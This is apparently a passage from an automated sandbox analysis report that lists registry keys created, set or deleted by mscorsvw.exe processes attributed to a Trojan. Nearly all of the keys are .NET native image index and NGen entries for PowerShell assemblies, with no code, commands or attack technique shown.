The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index58]
The process mscorsvw.exe:2248 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"MVID" = "F0 07 EE 1B F5 48 BA 76 1B A6 16 F4 C3 5B 15 8E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ConfigString" = "ZAP--0000-0000"
"MVID" = "9D 8E 8F 7B 7A E9 50 D8 65 44 54 05 97 83 7B 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\168b424e\2b\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ILDependencies" = "44 18 F2 39 EC CB 26 0B 6F 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigString" = "ZAP--0000-0000"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2644b2e9\635b32a7]
"66" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"SIG" = "1D 3D FC F9 F8 82 BC 47 B7 60 1D 39 80 29 76 15"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index64]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f\InvertDependencies\2644b2e9\635b32a7]
"66" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"DisplayName" = "Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 4E 18 4D 84 DF 6C DC 73 FA 06 25 CB D0 8F 59"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2644b2e9\635b32a7]
"66" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index64]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "92"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"LastModTime" = "18 1F 17 CB 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
The process mscorsvw.exe:504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"LastModTime" = "B2 CC 65 CB 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"DisplayName" = "Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"MVID" = "AB 6E A2 EF 90 77 0C 78 07 DB 52 DB 59 B5 A1 32"
"Status" = "0"
"DisplayName" = "Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2995e574\9\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 D7 85 00 0E 31 79 29 99 13 AB 09 13 CB 92 D5"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "98"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"SIG" = "07 95 68 2E 6D 23 41 45 81 DB 7F 93 51 3C 97 66"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
The process mscorsvw.exe:2504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
"Status" = "4098"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"SIG" = "3C 55 A6 91 EF 61 21 4C 93 C9 D8 16 A5 41 D7 5A"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigMask" = "4361"
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"MVID" = "DC 19 F5 0C 5E 84 E7 22 34 33 CC 70 9E 7E B4 3F"
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 BB A1 B3 5E A3 6A 25 9F 39 B6 E2 2A E6 D2 6D"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "94"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"LastModTime" = "1E 97 EE CA 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
The process mscorsvw.exe:2116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigMask" = "4361"
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"SIG" = "EC BB F6 79 DE 07 9A 4F A7 CE DF 48 D6 49 CE 93"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"LastModTime" = "AC 54 8E CB 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 72 22 1F 87 74 F7 5D 80 27 62 89 A5 65 8B BC"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "91"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"MVID" = "13 FC 3D AE F5 85 09 8F 11 91 1F 8F 72 AC 1C EA"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index59]
The process mscorsvw.exe:2428 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"ConfigMask" = "4361"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\3fa824d2\11\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index65]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"MVID" = "E2 17 82 39 6B BC 18 53 A8 67 A6 33 0D FD 66 7B"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\afa163\1f\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index65]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"ILDependencies" = "57 8D AB 19 D0 02 1A 29 07 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B 93 9A 07 14 89 55 FF 66 0C 4E 5E B8 BC 0E 76"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "101"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
The process mscorsvw.exe:2440 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 6A A2 4B 83 3A 6C 9C 10 31 76 49 A8 FC EC 1D"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD 64 CE FF 5C 5C E3 71 96 D6 36 FA EB 5A 27 DE"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 77 56 9C E1 EB F2 2B 64 12 29 38 2F 4E 84 27"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
